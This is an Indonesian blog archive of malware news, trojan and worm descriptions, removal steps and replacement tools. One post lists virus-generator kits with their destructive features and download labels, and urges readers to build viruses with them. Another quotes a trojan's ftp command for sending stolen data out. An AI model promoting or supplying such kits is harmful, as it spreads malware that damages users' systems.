Senin, 14 November 2011
Source Code of ZeuS Botnet Version: 2.0.8.9
Rabu, 10 Agustus 2011
Information on the Code Red Virus
Although the worm had been released on July 13, the largest group of infected computers was seen on July 19, 2001. On this day, the number of infected hosts reached 359,000.
Code Red has defacing many Web sites with the message "Hacked By Chinese," experts said. Despite the message, the origin of the virus is unknown.
The ultimate goal of the virus, known as a "worm," is to gather strength by infecting more computers and then have them all attack a numerical Internet address that represents the White House Web site. The assault, which was set to go off Thursday at 8 p.m. EDT, is a denial of service attack, designed to hamper or shut down a computer system by flooding it with huge amounts of data.
Jumat, 10 Juni 2011
Gejala dan Efek Trojan Webmoner
Keluarga Webmoner merupakan salah satu kelompok trojan yang dirancang untuk mencuri informasi/ data dari pengguna komputer terutama hal-hal yang berhubungan dengan data pribadi keuangan.
W32/Webmoner ditemukan sejak tahun 2004, dan hingga kini sudah ratusan varian W32/Webmoner yang beredar. Salah satu varian terbaru dari W32/Webmoner yang terdeteksi yaitu W32/Webmoner.BNH.
Memanfaatkan celah keamanan pada Windows yaitu Windows Shell Icon Handler / LNK (MS10-046)
# Aktif menggunakan file Windows (rundll32)
Agar tidak mudah diketahui oleh pengguna komputer, trojan W32/Webmoner.BNH berusaha menyamarkan identitas saat aktif dengan memanfaatkan file system Windows yaitu RUNDLL32.exe. Dengan file tersebut, trojan W32/Webmoner.BNH dapat dengan mudah melakukan infeksi, membaca aktivitas pengguna serta melakukan koneksi pada Remote Server
Saat komputer dinyalakan pertama kali dan login, Windows Explorer akan terasa lambat (hang) akibat aktifitas dari trojan yang menjalankan beberapa file RUNDLL32.EXE. Dengan begitu, pengguna komputer akan merasa terganggu dan tidak nyaman menggunakan komputer.
# Melakukan koneksi ke Remote Server
Trojan W32/Webmoner.BNH berusaha melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Koneksi ke remote server dilakukan dengan menggunakan berbagai macam port acak seperti :
127.0.0.1 : 45316, 2820, 5339, 47347, 28787, 30738, dll
xx.195.47.170 : 57381
# Mengupdate dirinya seperti antivirus
Agar mempermudah aksi-nya, trojan W32/Webmoner.BNH juga melakukan download beberapa file tertentu dari Remote Server serta agar tetap terupdate dan tidak mudah dikenali oleh antivirus.
# Melakukan transfer data/dokumen yang telah didapatkan ke Remote Server
Tujuan utama dari trojan W32/Webmoner.BNH adalah mendapatkan informasi dari pengguna komputer yang sudah terinfeksi. Untuk melakukan hal tersebut, trojan W32/Webmoner.BNH menggunakan perintah command sebagai berikut :
C:\WINDOWS\system32\ftp.exe ftp-s : C:\WINDOWS\system32\ftp.sys-A
Selain itu, dengan memanfaatkan celah keamanan MS10-046 (Windows Icon handler) maka file shortcut/LNK menjadi memiliki kemampuan worm dan akan dapat aktif secara otomatis saat kita mengakses drive tersebut tanpa menjalankan file tersebut sekalipun.
- JaringanDengan memanfaatkan akses full sharing, trojan W32/Webmoner.BNH dapat mudah masuk dengan melakukan kopi beberapa file yang sama seperti penyebaran pada removable drive/disk.
Untuk mengatasi trojan jenis ini, saya sarankan anda menjalankan langkah-langkah yang telah terdapat di sini
Kamis, 09 Juni 2011
Pertimbangan Memilih Antivirus yang Tepat
Selasa, 21 Desember 2010
AnVir TaskManager Portable
Kadang menyebalkan bukan jika fitur Task Manager di kompi kita di blok/ di disabled ma virus..???
Ndak usah khawatir.. AntiVir TaskManager Versi Portable bisa menjadi alternatif solusi bagi agan2
Aplikasi ini tentu saja memiliki banyak kelebihan dibandingkan dengan task manager bawaan dari windows..
Seperti kemampuan untuk mengendalikan segala sesuatu yang berjalan di komputer, menghapus proses Trojan, mempercepat komputer, tweak proses Monitor Windows , Services, program-program startup, menggantikan tugas Task Manager dari spyware dan virus yang mematikan antivirus, Meningkatkan dan melakukan tune up, Mengatur Windows startup pada XP, Vista atau Windows 7, Mampu melakukan hal yang tidak dapat dilakukan pada Task Manager bawaan Windows, Mengetahui secara detail proses services, dan lain lain
Screenshotnya :
Beberapa Fitur AnVir Task Manager:
* Deskripsi sebanyak + 70 000 + startup program, services dan Extensi Internet Explorer
* proses analisis security, program startup dan layanan dasar Windows
* Startup Monitor: alert jika ada proses start up baru, blok program startup yang tidak dikehendaki
* Analisa file pada VirusTotal.com dengan 30 + antivirus engine
* Startup manager: mengelola semua program yang berjalan pada startup termasuk service dan Internet Explorer toolbar
* Dapat menyimpan log HijackThis dengan tambahan info
* Antivirus scanner. Tool anti-rootkit
* Dilengkapi informasi database virus
* Blok proses yang tidak dikehendaki secara permanen
* Mencatat lalu lintas TCP / UDP dari proses ke file (sniffer)
* Monitor proses, layanan, koneksi internet, CPU, disk, memori, DLL, driver, file terkunci, Windows.
* Menampilkan grafik dari prosesor, memori dan disk aktivitas untuk setiap proses dan komputer
* Dll
Link Lokal : AnVIr TM 5.4.1 Portable FULL
Tutor nya bisa langsung di cek di mari : http://www.anvir.com/tutorial
my official thread at : here
Kamis, 09 Desember 2010
Mengatasi Virus Shortcut
2. Membuat file autorun.inf di setiap Drive, Flash disk, dan folder
3. Membuat file Thumb.db (hati2 tanpa huruf s) di setiap folder
4. Membuat file Microsoft.lnk dan bla.. bla.. bla.. .ink
5. Membuat duplikat setiap folder dengan extensi .lnk
6. Pada task manager terdapat services wscript.exe
1. Matikan System Restore.
Bisa menggunakan Process Explorer atau misc. tool pada HijackThis.
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk ukurannya 1 KB
Hapus semua file yang ditemukan.
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb
Minggu, 29 Agustus 2010
'Naik Kelas', Virus Lokal Manfaatkan Celah di Windows
Keberadaan virus itu disampaikan oleh peneliti antivirus dari Vaksincom, Alfons Tanujaya. "Dia membuat shortcut dan mengeksploitasi celah keamanan. Jarang virus lokal eksploitasi celah keamanan," tutur Alfons kepada detikINET, Kamis (26/8/2010).
Adang Jauhar Taufik, analis antivirus Vaksincom, mengatakan laporan pertama virus ini berasal dari kota Gorontalo di Sulawesi. Penyebaran virus ini diketahui melalui USB Flashdisk.
Virus ini mengubah folder yang ada di dalam USB Flashdisk menjadi shortcut. Kemudian, jika shortcut itu diakses virus akan menginfeksi komputer hingga kinerja komputer menjadi buruk.
Selain itu, Alfons mengatakan, virus ini melindungi dirinya dari piranti seperti Security Task Manager atau aplikasi pembunuh proses lainnya. Jika digunakan, aplikasi tersebut bisa hang atau mati.
"Kelihatannya, pembuat virusnya memperhatikan artikel-artikel pembasmian virus Vaksincom yang sering menggunakan Security Task Manager. Sehingga kalau dibersihkan, dia sudah prepare," kata Alfons.
Celah yang dimanfaatkan oleh virus ini adalah Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046. Microsoft telah menyediakan patch untuk menambal celah ini.
Norman Security Suite mendeteksi virus ini sebagai W32/VBWorm.BEUA. Untuk file shortcut-nya dikenali sebagai Trojan: LNK/CplLnk.A dan file .DLL dideteksi sebagai W32/Suspicious_Gen2.BTDDL.
Dr.Web Anti-virus mendeteksi virus ini sebagai W32/HLLW.Autoruner.25850. File shortcut-nya dikenali sebagai Exploit.Cpllnk dan file .DLL dideteksi sebagai Win32.HLLW.VBNA.3.
Adang mengatakan, virus ini dibuat dengan mengunakan program bahasa Visual Basic. Virus dengan ukuran 128 KB itu menurutnya akan memiliki ekstensi EXE atau SCR, serta icon Microsoft Visual Basic Project.
Jumat, 13 Agustus 2010
Winsta 'Menggelembung' Bikin Hardisk Penuh
Seperti dituturkan oleh analis antivirus dari Vaksincom, Adi Saputra, dalam keterangannya, Jumat (30/7/2010), Winsta dikenal juga dengan nama Stuxnet. Selain hardisk penuh, file Winsta juga bersembunyi sebagai file DLL sah dari Realtek, sehingga agak sulit mendeteksinya.
Penyebaran awal virus ini, menurut Adi, adalah melalui situs-situs berbahaya. Termasuk di antaranya adalah situs dengan konten porno, software ilegal dan situs-situs 'kelabu' lainnya.
Menurut analis Vaksincom Alfons Tanujaya, kepada detikINET, Jumat (30/7/2010), penyebaran Winsta di Indonesia cukup besar. Bahkan Indonesia menempati posisi kedua infeksi Winsta alias Stuxnet ini setelah Iran.
File Virus
Lebih lanjut, Adi mengatakan, jika script Trojan Stuxnet dari situs berbahaya tadi sudah berjalan akan muncul tiga file di komputer korban. Ketiganya adalah Winsta.exe, mrxcls.sys dan mrxnet.sys.
File bernama Winsta itu yang akan membengkak ukurannya sesuai sisa ruang hardisk yang ada. Biasanya partisi yang jadi korban adalah partisi tempat sistem operasi Windows berada.
Nama file itu, Winsta, dicatut dari nama file asli Windows untuk program bernama WinStation Monitor. Aplikasi ini merupakan tools yang digunakan pada Windows 2000 dan terletak di C:\Program Files\Resources\Winsta.exe.
Gejala & Efek Virus
Efek paling kasat mata dari virus ini tentunya adalah hardisk yang mendadak penuh. Akibat dari hardisk yang penuh itu, beberapa program mungkin tak akan berjalan dengan baik.
Selain itu,infeksi Stuxnet juga terjadi pada file sistem berikut:
- Scvhost, sehingga komputer sulit terhubung ke jaringan.
- Lsass, komputer bisa menjadi lambat, hang ataupun restart dengan sendirinya.
- Spoolsv, komputer tidak bisa mencetak dokumen/gambar lewat printer.
Virus Stuxnet Bakal Naik Daun
"Kalau Sinta-Jojo awalnya hanya merekam gambar sebagai hiburan pribadi yang dipublish. Stuxnet hadir secara sistematis memanfaatkan celah keamanan pada Microsoft yang selama ini ada dan tanpa disadari menggandeng LNK exploit dalam menyebarkan diri," ujar Yudhi Kukuh, Security Consultant ESET Indonesia, sesuai keterangan tertulis yang diterima detikINET, Kamis (12/8/2010).
Juni 2010 Stuxnet memang belum dikenal. Bahkan belum ada laporan masuk mengenai virus ini. Tepat satu bulan kemudian pada tanggal 15 Juli, ESET melalui ThreatSense Technology nya mengenali malware baru dengan nama LNK/Autostart.A trojan.
Kemudian dengan kemampuan heuristiknya, ESET mulai mengenali varian ini dengan nama LNK/Exploit.CVE-2010-2568. Setelah itu muncul W32/Stuxnet yang menargetkan pada sistem Industrial Control System (SCADA).
Apa Efeknya Pada PC Yang Terjangkit?
Menurut Yudhi, Stuxnet diprediksi akan terkenal karena kelalaian pengguna OS Microsoft Windows, untuk melakukan patch 2286198 karena berbagai hal. Paling sering adalah Automatic Update yang tidak dinyalakan. Biasanya ini terjadi pada OS Windows bajakan.
Komputer yang terjangkit biasanya hardisknya akan penuh tanpa sebab. Pasalnya, virus ini menyaru sebagai program resmi yang memiliki sertifikat keamanan curian, dari vendor terkenal.
Kehadirannya Stuxnet di Indonesia langsung menyodok ke urutan delapan dan sepuluh malware paling berbahaya pada Juli 2010. Berikut data sebaran 10 jenis malware dari ThreatSense ESET.
1. Win32/Conficker.AA
2. Win32/VB
3. Win32/Conficker.X
4. Win32/Agent
5. Win32/Conficker.Gen
6. Win32/Alman.NAB
7. Win32/VB.ROA
8. Win32/Stuxnet.A
9. Win32/Disabler.NAK
10. LNK/Autostart.A
Pada bulan Agustus 2010 Stuxnet dan variannya berhasil mengambil posisi Conficker dan varian dari VB/Autorun malware yang sudah berbulan-bulan selalu bercokol di 10 besar. Alhasil urutan tiga, lima dan sepuluh langsung diraihnya dalam waktu singkat.
1. Win32/Conficker.AA
2. Win32/Conficker.X
3. LNK/Autostart.A
4. Win32/Agent
5. Win32/Stuxnet.A
6. Win32/VB
7. Win32/Conficker.Gen
8. Win32/Alman.NAB
9. Win32/Sality.NAO
10. LNK/Exploit.CVE-2010-2568
Serangan Program Jahat Meningkat
dalam enam bulan pertama di 2010.
Hal tersebut diungkapkan oleh firma keamanan komputer dan internet McAfee. Data yang dirilis McAfee memperlihatkan, produksi total jumlah malware terus bertambah dan sekitar sepuluh juta kode malware baru disusun dalam katalog.
"Laporan terbaru kami memperlihatkan bahwa malware tengah mencapai pertumbuhan tertingginya dalam setengah tahun pertama 2010," kata Chief Technology Officer of Global Threat Intelligence McAfee, Mike Gallagher.
Dikutip detikINET dari Reuters, Rabu (11/9/2010), McAfee juga memperingatkan para pengguna komputer Mac. Padahal umumnya, pengguna komputer Mac dianggap aman dari serangan virus. Namun dalam laporannya McAfee menyebutkan bahwa pengguna komputer Mac pun berpotensi terkena serangan malware.
April silam, McAfee Labs mendeteksi adanya virus Trojan berbasis Mac yang dikenal dengan nama OSX/HellRTS. Virus ini membaca atau memodifikasi konten
clipboard atau memainkan trik pada user seperti membuka dan menutup drive CD.
"Kami tidak ingin membesar-besarkan serangan ini. Namun sebagai peringatan bahwa di era cybercrime seperti sekarang, pencurian data dan identitas pengguna semua sistem operasi dan perangkat patut dicegah," demikian bunyi laporan McAfee.
50 Malware Berbahaya Bulan Agustus 2010
Data berikut merupakan konten yang dikumpulkan dari server Kaspersky, berdasarkan jumlah serangan yang dikirimkan ke jaringan keamanan Kaspersky.
Adapun jumlah server jaringan keamanan Kaspersky saat ini berjumlah lebih dari 7.000. Untuk menyeleksinya menjadi top 50, malware-malware tersebut diukur tingkat bahayanya dengan jumlah serangan pada ribuan server Kaspersky di seluruh dunia.
Berdasar keterangan tertulis Kaspersky yang diterima detikINET, Jumat (13/8/2010), berikut adalah data urutan malware-malware berbahaya di Indonesia pada awal bulan ini:
----------------------------------------------------
Nama Malware Hits
----------------------------------------------------
Packed.Win32.Katusha.o 33.6842%
HEUR:Trojan.Win32.Generic 18.9474%
Trojan-Banker.Win32.Banker.ubf 4.2105%
Backdoor.Win32.Agent.awhk 3.1579%
Trojan-Dropper.Win32.Delf.ejv 2.1053%
Net-Worm.Win32.Kido.ih 2.1053%
Trojan.Win32.Refroso.bojv 2.1053%
Exploit.Win32.DCom.ad 2.1053%
not-a-virus:AdWare.Win32.Relevant.p 2.1053%
not-a-virus:AdWare.Win32.Relevant.q 2.1053%
Trojan-Dropper.Win32.Clons.hpx 2.1053%
Trojan-Spy.Win32.Ardamaxer.a 2.1053%
Trojan-Dropper.MSIL.Agent.ate 1.0526%
Packed.Win32.Black.d 1.0526%
HackTool.Win32.Flooder.z 1.0526%
HEUR:Trojan-Downloader.Win32.Generic 1.0526%
Trojan-Downloader.Win32.Agent.edla 1.0526%
Trojan.NSIS.StartPage.bb 1.0526%
Trojan-PSW.Win32.Dybalom.bkn 1.0526%
Backdoor.Win32.Aimbot.cg 1.0526%
Trojan.Win32.Agent.defn 1.0526%
Trojan.Win32.Buzus.fbur 1.0526%
Backdoor.MSIL.Agent.ju 1.0526%
Trojan.Win32.Agent.efdi 1.0526%
Trojan-GameThief.Win32.OnLineGames.wzfj 1.0526%
not-a-virus:AdWare.Win32.Rabio.xt 1.0526%
HackTool.Win32.Kiser.mc 1.0526%
Trojan-Dropper.Win32.Delf.fny 1.0526%
Backdoor.Win32.Bifrose.ceow 1.0526%
Trojan-Dropper.Win32.Delf.cjc 1.0526%
Trojan.Win32.Refroso.aavu 1.0526%
Packed.Win32.Krap.ae 1.0526%
Backdoor.Win32.Surila.ck 1.0526%
Trojan-Spy.Win32.Zbot.alpq 1.0526%
Senin, 24 Mei 2010
Ketika virus yang bagus dan kuat menginfeksi komputer, kebanyakan dari virus tersebut akan mendisable berjalannya Task Manager (taskmgr.exe), Registry Editor (regedit.exe), Command Prompt (cmd.exe), System Configuration Utility (msconfig.exe), folder option dan menyembunyikan Run dari Start Menu. Alasannya adalah karena kemungkinan para user yang mahir komputer dapat me-remove virus dengan menggunakan program-program tsb.
Ketika kita tidak bisa menjalankan Task Manager, kita tidak bisa mematikan proses virus. Paling tidak kita bisa menggunakan perintah taskkill pada Command Prompt, tapi sekali lagi, kita tidak bisa melakukan itu jika CMD pun telah di disable, mungkin kita bisa menjalankan msconfig untuk menghentikan virus dari auto startup, tapi tetap tidak bisa jika virus mendisablenya. Bagi para user advance yang mempunyai basic registry dan dengan cara itu mereka bisa secara manual me-remove virus dari list auto start up, tapi tetap tidak akan bisa juga jika file registry (regedit.exe) didisable. Begitu pula folder option dan proses-proses lainnya yang didisable untuk memperpanjang kinerja virus itu sendiri.
Jadi untuk hal-hal yang bersifat darurat, ada tool-tool pengganti yang bisa digunakan ketika tools asli windows banyak yang di disable, dari 12 tool yang akan sedikit dibahas disini hanyalah 6, yaitu :
1. Process Explorer sebagai pengganti Task Manager (taskmgr.exe)
Task Manager sangatlah penting karena dari situ kita bisa melihat hampir seluruh proses
Yang sedang berjalan di windows, begitu juga jumlah memory yang terpakai dan CPU yang terpakai. Jika kita menemukan sesuatu yang mencurigakan disitu, kita bisa akhiri prosesnya (terminating). Jika kita tidak bisa menggunakan Task Manager dan mendapatkan pesan “Task Manager has been disabled by your administrator”, kita bisa menggunakan Process Explorer. Tool ini portable kita bisa menyimpannya di usb drive.
2. RegAlyzer sebagai pengganti Registry Editor (regedit.exe)
Tanpa kemampuan untuk mengakses registry Windows, kita tidak bisa secar manual membuat perubahan sama sekali, tidak bisa mengimpor file registry (REG files). Ketika virus telah mendisable regedit kita dapat menemukan sebuah pesan "Registry editing has been disabled by your administrator”, ketika kita menjalankannya. Alternatif yang bagus adalah dengan menggunakan RegAlyzer, dikembangkan oleh Spybot. RegAlyzer membutuhkan isntalasi, tapi kita bisa copy semua folder yang talh jadi ke usb drive dan menjalakannya secara portable.
3. GS sebagai pengganti Command Prompt (cmd.exe)
Command prompt adalah tool yang powerful yang mendukung banyak perintah (commands) ketika kita menemukan sesuatu yang tidak bisa dilakukan di windows. Jika kita menjalankan command prompt dan mendapatkan pesan “The command prompt has been disabled by your administrator. Press any key to continue”, kita dapat menggunakan GS. GS adalah pengganti cmd, GS freeware dan portable.
4. Run Dialog Replacement 1.0 sebagai pengganti Kotak Dialog Run
Beberapa virus juga menghilangkan perintah run dari Start Menu dan tidaklah mudah untuk memunculkannya. Walaupun hal ini tidak begitu penting. Tapi Run memudahkan kita untuk melakukan perintah yang penting. Run Dialog Replacement V.1.0 cukup kecil, hanya berukuran 48 kb dan juga portable. Gunakan perintah Run dengan hanya menekan ctrl+R.
5. Autoruns sebagai penganti System Configuration Utility (msconfig.exe)
Msconfig adalah tempat pertama kali kita melakukan pemeriksaan ketika komputer didiagnosa terinfeksi virus. Jika kita menjalankan msconfig dan klik tab startup, maka akan terlihat seluruh program yang akan berjalan ketika windows baru start. Para pembuat virus sangat awas mereka biasanya mendelete file original msconfig atu mengganti lokasi aslinya dari registry windows. Jika kita menemukan pesan “Windows cannot find ‘msconfig’. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button, and then click Search.” ketika mengakses msconfig. Alternatif yang bagus untuk itu adalah tool Autoruns, satu publish dengan Process Explorer. Autoruns mempunyai banyak keterangan dari lokasi berjalannya suatu proses dari startup, menunjukkan program yang megnkonfigurasi ketika system booting dan login.
6. FreeCommander sebagai pengganti Folder Option
Saya telah banyak mencoba memanage file dan kebanyakan dari padanya merubah "show hidden files or hide protected opering system" dari setingannya pada windows. Jika virus tetap aktif di memory, maka masih bisa merubah setting untuk mendisable dari melihat file-file yang di sembunyikan (hidden) dan file system. FreeCommander adalah tool yang dapat melakukan aksi seperti folder option, tool ini portable. Kita dapat mengextract semua filenya ke usb drive.
Tool yang lain mempunyai fungsi yang hampir sama, diantaranya yaitu:
- autorun management application
- Proccess Master
- Sohand Removal tool
- Files And Folders Reset attrebiutes
pasti tanya.. lho.. kok ada link donlotnya???
wekeke.. emang sengaja belum gw share..
tapi seenggaknya, gw dah kasih alat pancingnya..
Rabu, 31 Maret 2010
Virus generator banyak tersebar di dengan beragam pilihan. Anda bisa mencarinya di forum-forum atau situs bawah tanah. Meskipun virus yang diciptakan dapat dibuah dengan mudah, namun anda tidak bisa meremehkan ketangguhanya. Beberapa virus terkenal di yang banyak menyebar di Indonesia atau di dunia banyak yang dibuat dengan virus generator ini.
Berikut beberapa virus generator yang cukup populer yang dapat anda coba untuk membuat virus dengan mudah:
1. In Shadow Batch Virus Generator
Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.
- Mematikan komputer otomatis, mendownload files otomatis, dll
Download In Shadow Batch Virus Generator
2. JPS Virus Maker
Kemampuan:
- Mematikan regedit, task manager, MS Config dan beragam aplikasi yang membahayakan kelangsungan hidup virus.
- Menonaktifkan anti virus, wordpad, notepad, command prompt, dll
- Menghiden drive, file, dan tombol-tombol penting seperti Shutdown, restart, logoff, dll
- Mematikan monitor, memainkan mouser, membuka CD drive, dll
Download JPS Virus Maker
3. TeraBIT Virus Maker
Kemampuan:
Memiliki beragam kemampuan seperti dua virus generator di atas.
Download TeraBIT Virus Maker
Rabu, 27 Januari 2010
Cabir dikenal juga dengan nama SymOS/Cabir.A, EPOC/Cabir.A, Worm.Symbian.Cabir.a, dan virus Caribe. Variannya kini telah berkembang hingga embel-embel abjad terakhir Cabir.Z. Cabir.Z sebenarnya merupakan varian dari Cabir B, hanya penyebarannya menggunakan nama velasco.sis.
Cabir akan mengaktifkan Bluetooth Anda secara periodic, sekitar 15-20 menit sekali untuk mencari mangsa. Tak ada kerusakan file yang berarti, hanya saja jika ponsel Anda terinfeksi, baterainya akan cepat habis karena digunakan untuk mencari perangkat Bluetooth lainnya.
Untuk mencegahnya, matikan (disable) fitur Bluetooth Anda. Aktifkan hanya saat akan digunakan. Dan yang perlu diingat adalah jangan menginstal aplikasi Symbian dengan nama caribe.sis atau nama-nama yang aneh.
Tipe serangan Commwarrior bermacam-macam. Yang paling umum, Commwarrior menyebar lewat Bluetooth. Beberapa varian juga dapat mengirim MMS acak ke kontak yang terdapat di phonebook Anda.
Commwarrior tak hanya punya satu nama. Layaknya penjahat, dia juga memiliki nama samaran atau alias seperti Commwarrior [dikenal oleh anvir F-Secure], SymbOS/Commwarrior [McAfee], SYMBOS_COMWAR [Trend Micro].
Saat ini varian Commwarrior terakhir adalah Commwarrior T. Commwarrior T dan Q hanya menginfeksi Symbian versi 8.1 atau yang lebih tua.
Selain menyebar secara sporadis, virus ini juga akan membuka halaman html di ponsel Anda dengan pesan:
Introduction Surprise! Your phone infected by CommWarrior worm v3.0. Matrix has you, Commwarrior inside. No panic please, is it very interesting to have mobile virus at own phone. This worm does not bring any harm to your phone and your significant data. About CommWarrior
wor for Nokia Series 60 provides automatic real-time protection against harmful Anti-Virus content. CommWarrior is free software and is distributed in the hope that it wil be useful, without anya warranty. Thank you for using CommWarrior.CommWarrior 2005-2006 by e10d0r.
Beberapa varian jenis virus ini telah tersebar. Pada varian skulls.A entah mengapa dia tidak memberikan efek apa-apa. Namun skulls.C dan H dan S, hampir semua ikonnya berubah menjadi tengkorak. Saat instalasi varian Skull H, memunculkan kalimat notifikasi “Install ‘beta’_092_free-sms-RM8″ sedangkan Skull S menampilkan kalimat “Install BlueNum Stealer”.
Tak hanya merubah ikon, skulls juga mampu melumpuhkan aplikasi-aplikasiyang ikonnya dirubah tadi. Umumnya saat kita memencet ikon uatu aplikasi maka yang muncul adalah pesan system eror.
Saat ini varian doombot bermacam-macam. Ada Doomboot A, C, L, M, G dan P. Doomboot termasuk virus kategori Trojan. Varian Doomboot.A menaruh dan membuat file-file korup dan bahayanya, setelah ponsel menginfeksi, ia akan menempatkan virus lainnya semisal Commwarrior.B ke dalam ponsel Anda. Sistem file yang korup tadi menyebabkan ponsel tidak dapat melakukan booting.
SymbOS.Doomboot.A misalnya, menyusup ke ponsel Anda dengan menyerupai file instalasi permainan Doom2 yang telah dicrack. Biasanya bernama Doom_2_wad_cracked_by_DFT_S60_v1.0.sis. Sedangkan Doomboot C menyusup dengan nama samaran “exoVirusStopv 2.13.19″,
mirip dengan nama anti virus ponsel. Jika menerima file tersebut dan menginstalnya, Anda tidak akan menerima pesan teknis apapun setelah itu. Anda juga tak akan mengira bahwa ponsel telah terinfeksi karena tak ada ikon atau tanda apapun setelah proses instalasi.
Varian CardTrap lumayan banyak. Dari varian berhuruf tunggal seperti CardTrap P, Q, R, S hingga varian beraksara ganda sepert CardTrap AA, AG, AJ dan seterusnya.
Biasanya CardTrap menyaru dengan memakai nama-nama game atau aplikasi terkenal seperti Kingkong, Half Life, Battefield 2 dan lain-lain.
CardTrap Z misalnya, menyaru dengan nama SeleQ 1.7 – CrackedTNT.sis.
CardTrap merusak sistem dengan cara mematikan beberapa aplikasi built in Symbian. Virus ini juga cukup canggih sehingga mampu melumpuhkan beberapa jenis anti virus. Selanjutnya, jikalau ada kesempatan untuk terkoneksi ke computer, CardTrap akan berupaya menanam virus ke dalam PC berbasis Windows.
Beberapa varian seperti CardTrap Z juga dapat mematikan fungsi keypad, mengacaukan aplikasi-aplikasi pihak ketiga, dan menyebarkan filefile rusak ke dalam kartu memori hingga mengakibatkan kekacauan sistem.
Virus ini dibuat menggunakan Visual basic. Pada salah satu variannya, seperti contohnya Buxto.C, ia memiliki ukuran tubuh sebesar 266.240 bytes, tanpa di-pack. Icon virus ini menyerupai icon aplikasi browser Mozilla Firefox. Virus ini dikenal dapat membuat autorun di setiap drive yang ia temui untuk dapat menyebar. Dan satu hal, pesan yang disampaikan oleh virus ini cukup nyeleneh, seperti layaknya sebuah pesan iklan.
Saat menyebar, ia akan membuat file Desktop.ini dan autorun.inf dengan attribut hidden dan system. File tersebut akan disebarnya ke setiap drive yang ia temukan pada komputer terinfeksi. Ia juga akan berusaha untuk menyebarkan dirinya pada jaringan setempat dengan sebelumnya telah mematikan fasilitas firewall milik Windows. Pada komputer terinfeksi, akan terdapat beberapa file induk virus. Diantaranya, pada direktori System32, akan ada file dengan nama wmiprvse.exe dan mgrShell.exe, lalu file inti ini akan men-drop file lainnya dari dalam tubuhnya pada direktori Temp dengan nama ctfmon.exe dan pada direktori Windows dengan nama svchost.exe. Dan untuk mempercepat aksi penyebarannya, virus ini pun men-set registry NoDriveTypeAutoRun agar mendukung autorun pada floppy disk.
Ia hadir dengan icon yang mirip dengan file multimedia milik WinAmp. Varian B memiliki ukuran file 49.152 bytes, tanpa di-pack. Sementara itu, varian C yang kami temukan, memiliki ukuran file sebesar 19.968 bytes, dan di-pack menggunakan UPX. Seperti yang lalu, ia akan menggantikan seluruh file multimedia yang ia temukan seperti MP3, 3GP, AVI, WMV, ASF, MPG, MPEG, MP4, pada komputer korban dengan dirinya sendiri, dengan menggunakan nama yang hampir sama, hanya ditambahkan extension .EXE di akhirnya. Virus ini juga akan mengubah setingan di registry untuk mendukung kelangsungan hidupnya, seperti menyembunyikan Folder Options, mem-blok Regedit, System Restore, dan lainnya. Diketahui, Virgear juga mencoba untuk mem-blok antivirus dan virus lain. Untuk itu, rename (ubah nama) dari PCMAV-CLN.exe sebelum Anda menggunakannya, misalkan menjadi 123456.exe. Dan, pada komputer terinfeksi, ia akan menampilkan kalimat “++++ Makanya jangan handak buka BF ja, neh rasain oleh2 dari amang hacker ++++” pada caption Internet Explorer.
Virus produksi lokal yang satu ini dibuat menggunakan Visual Basic, dengan ukuran sebesar 67.072 byte dengan kondisi di-packscramble. Di registry, ia menciptakan item run baru di HKLM, dengan nama service yang menunjuk pada salah satu file induknya yang ada di direktori Windows dengan nama dllhost.exe. Selain itu, pada direktori tersebut dapat ditemukan pula sebuah file gambar yang akan dijadikan wallpaper olehnya dengan nama Pl0Lonx.jpg. Jadi pada komputer terinfeksi, wallpaper desktop dari komputer tersebut akan ia ubah menjadi gambar bertemakan “Linux SuSE”. Selain itu, untuk dapat aktif otomatis, ia juga menempatkan dirinya pada folder StartUp dengan nama Empty.pif. yang kemungkinan besar menggunakan UPX yang di-
8. Autorunme
Virus yang bukan produksi programer lokal ini memiliki ukuran sebesar 26.835 bytes, dan diperkirakan di-pack menggunakan PECompact. Ia tidak memiliki icon, hanya menggunakan icon standar applications dari Windows. Saat menginfeksi, ia mencoba untuk menanamkan file induknya pada direktori C:\Windows\System dengan nama msvc32s.exe dan dengan attribut hidden dan system, serta membuat autorun baru di registry dengan nama “Windows msvc Control Centers”. Virus yang dapat menyebar melalui media penyimpan data seperti flash disk ini juga dapat menyebar melalui aplikasi Instant Messaging. Pada flash disk, ia akan membuat folder tiruan Recycle Bin yang berisi file dengan nama autorunme.exe, lalu mengarahkan autorun.inf untuk menjalankan file virus tersebut. Jadi, saat user mencolokan flash disk tersebut lalu mengakses drive yang dimaksud, virus tersebut akan aktif.
10. Kalong.vbs varian
Minggu, 17 Januari 2010
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut:
- Secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda”(Une Carte Pour Vous, atau A Card For You);
- Begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.
Selasa, 29 Desember 2009
Code Infeksi USB
